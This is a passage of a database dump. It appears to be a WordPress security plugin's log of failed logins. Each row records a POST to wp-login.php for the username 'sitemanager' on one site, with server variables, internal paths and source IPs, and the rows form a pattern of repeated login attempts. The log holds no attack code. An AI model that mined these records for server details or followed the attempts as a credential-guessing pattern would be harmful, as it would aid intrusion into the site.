Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33474\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745472293.451695;s:12:\"REQUEST_TIME\";i:1745472293;}}','199.188.200.191',0,'2025-04-24 10:54:55','1970-01-01 00:00:00'),(94052,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36584\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745472640.5859931;s:12:\"REQUEST_TIME\";i:1745472640;}}','199.188.201.172',0,'2025-04-24 11:00:42','1970-01-01 00:00:00'),(94053,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38518\";s:11:\"REMOTE_ADDR\";s:14:\"203.26.151.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745472983.799921;s:12:\"REQUEST_TIME\";i:1745472983;}}','203.26.151.246',0,'2025-04-24 11:06:25','1970-01-01 00:00:00'),(94054,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37956\";s:11:\"REMOTE_ADDR\";s:15:\"103.154.184.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745473321.150795;s:12:\"REQUEST_TIME\";i:1745473321;}}','103.154.184.168',0,'2025-04-24 11:12:03','1970-01-01 00:00:00'),(94055,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51454\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.219.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745473664.091928;s:12:\"REQUEST_TIME\";i:1745473664;}}','157.230.219.118',0,'2025-04-24 11:17:45','1970-01-01 00:00:00'),(94056,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55048\";s:11:\"REMOTE_ADDR\";s:14:\"192.250.234.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745474009.1564751;s:12:\"REQUEST_TIME\";i:1745474009;}}','192.250.234.26',0,'2025-04-24 11:23:31','1970-01-01 00:00:00'),(94057,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41776\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745474359.072964;s:12:\"REQUEST_TIME\";i:1745474359;}}','162.213.251.71',0,'2025-04-24 11:29:21','1970-01-01 00:00:00'),(94058,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43664\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745474722.0813711;s:12:\"REQUEST_TIME\";i:1745474722;}}','198.54.114.43',0,'2025-04-24 11:35:23','1970-01-01 00:00:00'),(94059,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49952\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745475076.0982749;s:12:\"REQUEST_TIME\";i:1745475076;}}','199.188.201.172',0,'2025-04-24 11:41:18','1970-01-01 00:00:00'),(94060,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57190\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745475426.9604599;s:12:\"REQUEST_TIME\";i:1745475426;}}','157.245.6.207',0,'2025-04-24 11:47:08','1970-01-01 00:00:00'),(94061,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35600\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745475780.0374;s:12:\"REQUEST_TIME\";i:1745475780;}}','199.188.200.145',0,'2025-04-24 11:53:01','1970-01-01 